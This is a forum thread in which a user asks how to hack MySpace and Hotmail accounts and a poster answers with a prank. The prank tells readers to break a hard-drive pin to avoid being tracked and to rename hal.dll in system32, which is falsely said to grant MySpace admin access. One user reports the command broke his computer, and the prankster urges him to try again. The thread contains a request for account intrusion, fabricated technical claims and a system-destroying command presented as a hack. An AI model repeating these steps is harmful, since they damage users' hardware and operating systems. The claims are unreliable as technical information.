edgardoy

how to hack my space

Post by edgardoy »

i need info to how hack my space and msn hotmail thanks
plope0726

Re: how to hack my space

Post by plope0726 »

edgardoy wrote:i need info to how hack my space and msn hotmail thanks
The first thing you need is take you hard drive out and break of the 5th pin from the left on the second row of pins. This is the pin that makes your computer trackable. Once that pin is removed, you can hack any one without getting caught.

Then you need to open command prompt and run the following commands.

ping myspace.com (if after this command it says reply from... then you have made your connection.)

now enter the following:

ren c:\windows\system32\hal.dll hack.dll

Then restart your computer. When your system reboots you will have admin access to myspace.
koolpop0

Post by koolpop0 »

i remember learning these tricks its amazing!

i broke the 6th pin instead of the 5th to be honest and i used a proxy :p
sabretooth

Post by sabretooth »

plope0726 wrote:
edgardoy wrote:i need info to how hack my space and msn hotmail thanks
The first thing you need is take you hard drive out and break of the 5th pin from the left on the second row of pins. This is the pin that makes your computer trackable. Once that pin is removed, you can hack any one without getting caught.

ping myspace.com (if after this command it says reply from... then you have made your connection.)

now enter the following:

Then restart your computer. When your system reboots you will have admin access to myspace.

you are amazing. :)
plope0726

Post by plope0726 »

Do you think he actually tried it? :lol:
Douglas

Post by Douglas »

plope0726 wrote: The first thing you need is take you hard drive out and break of the 5th pin from the left on the second row of pins. This is the pin that makes your computer trackable. Once that pin is removed, you can hack any one without getting caught.

now enter the following:

can I ask you why? I mean, why you have access as admin? I think is more interesting standy why...
Zaffron

Post by Zaffron »

well since he isnt replying, there is a distinct possibility he fucked his computer.
Read, know, do. Discuss topics of ANY kind, including unconventional or taboo topics. Free speech, open minds, alternative thinking. http://www.totse2.com
Douglas

Post by Douglas »

Zaffron wrote:well since he isnt replying, there is a distinct possibility he fucked his computer.
I tryed it... and yes my computer was fucked, but I use Ubuntu too... I spent lot of time to can place again the file into system32 and I had lot of problem but I've done it... so I have to thanks plope0726 for the challage... ^^ new lesson learned... XD
plope0726

Post by plope0726 »

Douglas wrote:
Zaffron wrote:well since he isnt replying, there is a distinct possibility he fucked his computer.
I tryed it... and yes my computer was fucked, but I use Ubuntu too... I spent lot of time to can place again the file into system32 and I had lot of problem but I've done it... so I have to thanks plope0726 for the challage... ^^ new lesson learned... XD
You probably had a problem because you forgot to break the 5th pin from the left on the second row of pins on your hard drive. Go try it again.
megatron40

Post by megatron40 »

Douglas wrote:
And so begins the intellectual impairment of of the next generation. :roll:
"The man who doesn't read... has no advantage over the man who can't read..." - Mark Twain
Zaffron

Post by Zaffron »

I hope that the apocalypse hurries up and enforces Darwinian theory :/
Read, know, do. Discuss topics of ANY kind, including unconventional or taboo topics. Free speech, open minds, alternative thinking. http://www.totse2.com
Douglas

Post by Douglas »

plope0726 wrote: You probably had a problem because you forgot to break the 5th pin from the left on the second row of pins on your hard drive. Go try it again.
I don't usually open my pc to break something random... ^^

I known that you was kidding him, but I wished to see what happened after that...
koolpop0

Post by koolpop0 »

Douglas wrote:
plope0726 wrote: You probably had a problem because you forgot to break the 5th pin from the left on the second row of pins on your hard drive. Go try it again.
I don't usually open my pc to break something random... ^^

I known that you was kidding him, but I wished to see what happened after that...
Not to be annoying but how many years have you spoken English?
Zaffron

Post by Zaffron »

eleventy fiveteen ^_^
Douglas

Post by Douglas »

koolpop0 wrote: Not to be annoying but how many years have you spoken English?
NP... I still have to learn a lot... anyway I'm 18, so 7-8 years at school...